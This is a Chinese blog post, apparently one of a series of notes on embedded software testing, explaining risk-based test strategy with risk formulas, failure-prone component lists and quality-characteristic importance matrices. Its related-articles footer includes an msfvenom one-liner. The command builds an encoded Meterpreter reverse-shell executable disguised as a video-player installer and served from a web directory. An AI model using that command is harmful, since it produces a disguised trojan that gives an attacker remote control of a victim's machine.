嵌入式软件测试笔记7 | 嵌入式软件测试中基于风险的测试策略如何开展?

news/2025/2/23 15:32:34

7 | 嵌入式软件测试中基于风险的测试策略如何开展?

  • 1 风险评估
    • 1.1 分析风险
    • 1.2 如何估计故障几率?
    • 1.3 导致故障几率较高的因素
    • 1.4 估计可能的损失
    • 1.5 风险评估的来源
    • 1.6 风险的处理
  • 2 主测试计划中的策略
    • 2.1 目标
    • 2.2 制定策略的步骤
    • 2.3 选择质量特性
    • 2.4 确定质量特性的相对重要性
    • 2.5 为测试层次分配质量特性
  • 3 测试层次中的策略
    • 3.1 选择质量特性
    • 3.2 确定质量特性的相对重要性
    • 3.3 将系统分解为子系统
    • 3.4 确定子系统的相对重要性
    • 3.5 确定每个子系统/质量特性联合体的测试重要性
    • 3.6 确定要使用的测试技术
  • 4 测试过程中的策略变更
  • 5 维护测试策略

1 风险评估

1.1 分析风险

  • 著名公式:
风险 = 失败几率 * 受到的损失
  • 公式说明:

失败几率与系统的使用频率和单个故障几率有关;

1.2 如何估计故障几率?

以下有助于估计故障几率,他给出了容易发生故障的位置:

  • 复杂部件;
  • 全新部件;
  • 经常改动的部件;
  • 首次采用某种工具或技术的部件;
  • 在开发过程中从一个开发人员移交给另一个开发人员的部件;
  • 在时间及其紧迫的情况下构建的部件;
  • 超过优化频率平均值而频繁优化的部件;
  • 在早期发现过许多缺陷的部件;
  • 有许多接口的部件。

1.3 导致故障几率较高的因素

  • 无经验的开发人员;
  • 用户代表参与不足;
  • 开发过程中缺少质量保障;
  • 质量不高的低层次测试;
  • 新的开发工具和开发环境;
  • 大型开发团队;
  • 沟通不畅的开发团队;
  • 在组织内存在尚未解决的冲突的情况下,迫于行政压力而开发的部件。

1.4 估计可能的损失

  • 修理复用;
  • 负面新闻报道;
  • 市场份额丢失;
  • 用户合法要求赔偿;
  • 收入减少等。

1.5 风险评估的来源

  • 最终用户;
  • 支持工程师;
  • 产品经理;
  • 架构设计师;
  • 程序员;
  • 测试人员;
  • 质量保证人员。

1.6 风险的处理

在这里插入图片描述

2 主测试计划中的策略

2.1 目标

使组织内的成员对必须避免的风险获得认知,以及约定在开发过程中,在何时何地需要执行多少测试。

2.2 制定策略的步骤

  • 选择质量特性;
  • 确定质量特性的相对重要性;
  • 为测试层次分配质量特性。

2.3 选择质量特性

  • 详细说明质量特性;
  • 提供典型的例子;
  • 定义衡量质量特性的方法。

2.4 确定质量特性的相对重要性

举例说明:比如质量特性的相对重要性矩阵如下:

质量特性相对重要性(%)
连接性10
效率(内存)-
功能40
可维护性-
性能15
可恢复性5
可靠性10
安全性-
适用性20
可用性-
总计100

2.5 为测试层次分配质量特性

  • 用矩阵来表示,行为测试层次,列为质量特性;
  • 每一个交叉点的符号(++、+或空白)表示测试层次在质量特性中的覆盖程度;
++ : 该测试层次将完全覆盖质量特性;
 + : 该测试层次将覆盖一部分质量特性;
空 :该测试层次与质量特性无关。 
  • 举例:
功能连接性可用性可恢复性性能适用性
40101051520
单元测试+++
SW集成测试+++
HW/SW集成测试+++++
系统测试++++
验收测试+++++
实地测试++++

3 测试层次中的策略

3.1 选择质量特性

  • 采用的原则与主测试计划一致。

3.2 确定质量特性的相对重要性

  • 举例如下:
质量特性相对重要性(%)
功能40
性能25
可靠性10
适用性25
总计100

3.3 将系统分解为子系统

  • 子系统也可以理解为部件、功能单元等。

3.4 确定子系统的相对重要性

  • 举例:
子系统相对重要性(%)
A部分30
B部分10
C部分30
D部分5
整个系统25
总计100

3.5 确定每个子系统/质量特性联合体的测试重要性

  • 用矩阵来表示,行为质量特性,列为子系统;
  • 每一个交叉点的符号(++、+或空白)表示测试层次在质量特性中的覆盖程度;
++ : 质量特性对该子系统起主导作用;
 + : 质量特性和该子系统相关;
空 :质量特性和该子系统无关。 
  • 举例:
相对重要性(%)A部分B部分C部分D部分整个系统
100301030525
功能性40++++++
性能25+++++
可靠性10+++
适用性25+++++

3.6 确定要使用的测试技术

影响选择测试技术的因素

  • 被测试的质量特性;
  • 应用的领域;
  • 需要的测试基础;
  • 需要的资源;
  • 需要的知识和技能。

4 测试过程中的策略变更

  • 项目进度表的变更导致;
  • 产品内容发生变化导致;
  • 测试结果导致。

5 维护测试策略

按照变更需求来规划测试策略的步骤:

  • 确定变更;
  • 确定变更和回归的重要性;
  • 选择质量特性;
  • 确定质量特性的相对重要性;
  • 确定每个变更(回归)/质量特性联合体的相对重要性;
  • 确定可用的测试技术。

http://www.niftyadmin.cn/n/475180.html

相关文章

使用msfvenom获取windows shell

Windows 1. kali 使用 msfvenom 生成程序文件 使用一个编码器msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.133.66 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/西瓜影音1.exe其中,-a 指…

【Docker】Docker Desktop更换非C盘符(减轻占用率)

Win10中的Docker Desktop调整到其他盘符,由于新版本已经不让修改软连接了,只好另谋策略,最终还是改成功了。 出现问题 使用软连接修改 上面代码我们可以科幻的理解一下 幻想破灭 //TODO 用户点击执行安装 if(检查文件夹是否软连接){有则&a…

8.11 TCP链接管理与UDP协议

目录 TCP的链接管理 TCP包头 连接的建立——”三次握手” 连接的释放——“四次挥手” 保活计时器 UDP协议 计算机网络体系结构 UDP协议 UDP的主要特点 UDP是面向报文的 TCP的链接管理 TCP包头 连接的建立——”三次握手” TCP 建立连接的过程叫做握手。 采用三报文…

HarmonyOS学习路之开发篇—AI功能开发(助手类意图识别)

助手类意图识别概述 随着人机交互越来越普遍,设备需要理解用户下达的各种指令,方便用户的操作。助手类意图识别能够利用机器学习技术,对用户发送给设备的文本消息进行语义分析和意图识别,进而衍生出各种智能的应用场景&#xff0…

2023ty计网期末综合题满分冲刺版

1. 假设有段1km长的CSMA/CD网络链路的数据传输率为1Gb/s。设信号在此链路媒介上的传播速度为2x105 km/s,求使用此协议的最短数据帧长度。 (1)传播时延:1/2000005微秒, (2)往返时延&#xff1a…

vant组件改为 uview-plus 组件的时分秒组件

项目中本来使用过了vant 的组件,但是uniapp 和vant并不兼容,除了几个普通的组件能用之外,想使用弹窗的话vant就完成不了了,还好uniapp官方支持的 uview-plus 支持vue3,就给项目更换了。之前使用vant封装的组件这时候也…

16.RocketMQ之消费重试以及原理

highlight: arduino-light 1.4 消费重试 对于顺序消息,当消费者消费消息失败后,消费者会在本地自动不断进行消息重试,每次间隔时间为 1 秒,重试最大值是 Integer.MAX_VALUE。 对于无序消息(普通、定时、延时、事务消息)当消费者消费消息失败时可以通过设置返回状态达到重试的目…

【论文阅读】Dynamic Split Computing for Efficient Deep Edge Intelligence

论文信息 作者:Arian Bakhtiarnia, Nemanja Milošević, Qi Zhang, Dragana Bajović, Alexandros Iosifidis 发表会议: ICML 2022 DyNN WorkshopICASSP 2023发表单位: ∗DIGIT, Department of Electrical and Computer Engineering, Aarhus University, Denmark. †Fa…